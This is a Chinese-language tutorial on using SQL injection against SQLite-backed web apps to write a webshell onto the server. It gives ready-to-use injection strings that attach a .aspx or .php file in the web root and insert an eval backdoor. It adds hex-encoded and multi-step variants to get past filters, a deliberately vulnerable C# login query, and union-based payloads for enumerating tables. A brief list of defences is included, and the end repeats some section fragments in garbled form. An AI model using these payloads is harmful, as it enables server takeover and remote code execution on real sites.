SQLite手工注入Getshell技巧详解<\/h1>

0x01 SQLite数据库简介<\/h2>

SQLite是一种嵌入式数据库，其特点包括：<\/p>

数据库以单个文件形式存在<\/li>
零配置，无需复杂安装或管理<\/li>
由C语言编写，体积小巧<\/li>
常用于移动应用(App)中<\/li>

语法与其他数据库类似但有一些独特特性<\/li> <\/ul>

0x02 SQLite基础操作<\/h2>

数据库创建方法<\/h3>

创建新数据库<\/strong>：<\/p>

sqlite3.exe 数据库文件名
<\/code><\/pre>
示例：创建aa.db数据库<\/p>
sqlite3.exe aa.db
<\/code><\/pre>
<\/li>

附加数据库<\/strong>：<\/p>
ATTACH DATABASE<\/span> 'DatabaseName'<\/span> As<\/span> 'Alias-Name'<\/span>;
<\/span><\/span><\/code><\/pre>示例：附加bb.db数据库并设置别名为a<\/p>
attach database<\/span> 'd:\\sqlite\\bb.db'<\/span> as<\/span> 'a'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
表操作<\/h3>
创建表并插入数据：<\/p>
create<\/span> table<\/span> a.tt(dataz text);
<\/span><\/span>INSERT<\/span> into<\/span> a.tt(dataz) VALUES<\/span> ('test'<\/span>);
<\/span><\/span><\/code><\/pre>0x03 SQLite注入Getshell原理<\/h2>
SQLite可以创建任意后缀名的数据库文件，且文件内容会以原格式存储。当创建.php或.aspx后缀的数据库文件并插入相应代码时，这些代码会被服务器解析执行。<\/p>
生成PHP Webshell<\/h3>
ATTACH DATABASE<\/span> 'd:\\sqlite\\23.php'<\/span> AS<\/span> test;
<\/span><\/span>create<\/span> TABLE<\/span> test.exp (dataz text);
<\/span><\/span>insert<\/span> INTO<\/span> test.exp (dataz) VALUES<\/span> ('<?php phpinfo();?>'<\/span>);
<\/span><\/span><\/code><\/pre>生成ASPX Webshell<\/h3>
ATTACH DATABASE<\/span> 'd:\\web\\shell.aspx'<\/span> AS<\/span> test;
<\/span><\/span>create<\/span> TABLE<\/span> test.exp (dataz text);
<\/span><\/span>insert<\/span> INTO<\/span> test.exp (dataz) VALUES<\/span> ('<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'<\/span>);
<\/span><\/span><\/code><\/pre>0x04 本地环境搭建与测试<\/h2>
环境准备<\/h3>

安装Sqlite ADO.NET<\/li>
获取System.Data.SQLite.DLL文件（注意32\/64位版本）<\/li>
使用VS2013创建ASP.NET网站项目<\/li>
将DLL文件放入项目的Bin目录<\/li>
<\/ol>
示例漏洞代码<\/h3>
Default.aspx.cs中的关键代码：<\/p>
protected<\/span> void<\/span> btn_Click(object<\/span> sender, EventArgs e) {
<\/span><\/span>    if<\/span> (TextBox1.Text != ""<\/span>){
<\/span><\/span>        SQLiteConnection conn = new<\/span> SQLiteConnection("Data Source="<\/span> + Server.MapPath("UserData.dbx"<\/span>));
<\/span><\/span>        conn.Open();
<\/span><\/span>        SQLiteCommand cmd = new<\/span> SQLiteCommand();
<\/span><\/span>        cmd.CommandText = "select UserPassword from Users where UserName='"<\/span> + TextBox1.Text.Trim()+"'"<\/span>;
<\/span><\/span>        cmd.Connection = conn;
<\/span><\/span>        \/\/ 执行查询...<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>0x05 注入利用实战步骤<\/h2>
1. 检测注入点<\/h3>
输入单引号'<\/code>测试，观察是否报错并暴露路径信息<\/p>
2. 直接写入Webshell<\/h3>
';ATTACH DATABASE '<\/span>c<\/span>:\\<\/span>WebSite\\<\/span>shell.aspx' AS pwn;
<\/span><\/span><\/span>create TABLE pwn.exp (dataz text);
<\/span><\/span><\/span>insert INTO pwn.exp (dataz) VALUES ('<\/span><%@<\/span> Page Language<\/span>=<\/span>"Jscript"<\/span>%><%<\/span>eval(Request.Item["pass"<\/span>],"unsafe"<\/span>);%><\/span>');--
<\/span><\/span><\/span><\/code><\/pre>3. 绕过写入限制的技巧<\/h3>
当直接写入失败时（特殊字符导致问题），可采用以下方法：<\/p>
方法一：十六进制编码<\/strong><\/p>
';ATTACH DATABASE '<\/span>d:\\<\/span>web\\<\/span>shell.aspx' AS pwn;
<\/span><\/span><\/span>create TABLE pwn.exp (dataz text);
<\/span><\/span><\/span>insert INTO pwn.exp (dataz) VALUES (x'<\/span>3<\/span>c25402050616765204c616e67756167653d224a736372697074223e3c256576616c28526571756573742e4974656d5b2270617373225d2c22756e7361666522293b253e');--
<\/span><\/span><\/span><\/code><\/pre>注意<\/strong>：SQLite中十六进制写法为x'....'<\/code>而非0x....<\/code><\/p>
方法二：分步写入<\/strong><\/p>


先创建空数据库文件<\/p>
';ATTACH DATABASE '<\/span>d:web\\<\/span>fp.jpg' AS pwn;create TABLE pwn.exp(dataz text);--
<\/span><\/span><\/span><\/code><\/pre><\/li>

下载该文件，在本地插入数据后重新上传<\/p>
<\/li>

将内容从jpg数据库复制到aspx数据库<\/p>
';ATTACH DATABASE '<\/span>d:web\\<\/span>shell.aspx' AS pwn2;
<\/span><\/span><\/span>create TABLE pwn2.exp(dataz text);
<\/span><\/span><\/span>insert INTO pwn2.exp (dataz) SELECT dataz FROM pwn.exp;--
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x06 常见问题与解决方案<\/h2>


写入成功但无法执行<\/strong>：<\/p>

检查文件权限<\/li>
确认文件内容是否正确（可能有额外空格等问题）<\/li>
使用十六进制编码绕过特殊字符问题<\/li>
<\/ul>
<\/li>

数据库编码不一致<\/strong>：<\/p>

尝试在相同环境下生成数据库文件<\/li>
使用十六进制编码确保数据一致性<\/li>
<\/ul>
<\/li>

写入内容被截断<\/strong>：<\/p>

检查SQL语句中的引号是否正确转义<\/li>
使用十六进制编码方式<\/li>
<\/ul>
<\/li>
<\/ol>
0x07 防御建议<\/h2>

使用参数化查询<\/li>
对用户输入进行严格过滤<\/li>
限制数据库文件的写入权限<\/li>
禁止上传或创建可执行文件类型的数据库<\/li>
定期进行安全审计和渗透测试<\/li>
<\/ol>
0x08 总结要点<\/h2>

SQLite可以创建任意格式的数据库文件，且插入的代码会根据文件后缀被解析执行<\/li>
利用ATTACH DATABASE和CREATE TABLE语句可以写入Webshell<\/li>
当直接写入失败时，十六进制编码是有效的绕过方法<\/li>
SQLite中十六进制的正确写法是x'....'<\/code><\/li>
分步写入（先创建空文件再插入内容）可以提高成功率<\/li>
<\/ol>
附录：常用SQLite注入语句<\/h2>


测试注入点：<\/p>
' or 1=1--
<\/span><\/span><\/span><\/code><\/pre><\/li>

获取数据库信息：<\/p>
' union select 1,sqlite_version(),3--
<\/span><\/span><\/span><\/code><\/pre><\/li>

列出所有表：<\/p>
' union select 1,name,3 from sqlite_master where type='<\/span>table<\/span>'--
<\/span><\/span><\/span><\/code><\/pre><\/li>

获取表结构：<\/p>
' union select 1,sql,3 from sqlite_master where name='<\/span>表名<\/span>'--
<\/span><\/span><\/span><\/code><\/pre><\/li>

写入Webshell（十六进制版）：<\/p>
';ATTACH DATABASE '<\/span>\/<\/span>var\/<\/span>www\/<\/span>html\/<\/span>shell.php' AS pwn;
<\/span><\/span><\/span>create TABLE pwn.exp (dataz text);
<\/span><\/span><\/span>insert INTO pwn.exp (dataz) VALUES (x'<\/span>3<\/span>c3f70687020706870696e666f28293b203f3e');--
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>

SQLite手工注入Getshell技巧详解<\/h1>

0x02 SQLite基础操作<\/h2>

0x03 SQLite注入Getshell原理<\/h2> SQLite可以创建任意后缀名的数据库文件，且文件内容会以原格式存储。当创建.php或.aspx后缀的数据库文件并插入相应代码时，这些代码会被服务器解析执行。<\/p>

0x04 本地环境搭建与测试<\/h2>

0x05 注入利用实战步骤<\/h2>

1. 检测注入点<\/h3> 输入单引号'<\/code>测试，观察是否报错并暴露路径信息<\/p>

0x03 SQLite注入Getshell原理<\/h2>
SQLite可以创建任意后缀名的数据库文件，且文件内容会以原格式存储。当创建.php或.aspx后缀的数据库文件并插入相应代码时，这些代码会被服务器解析执行。<\/p>

1. 检测注入点<\/h3>
输入单引号`'<\/code>测试，观察是否报错并暴露路径信息<\/p>`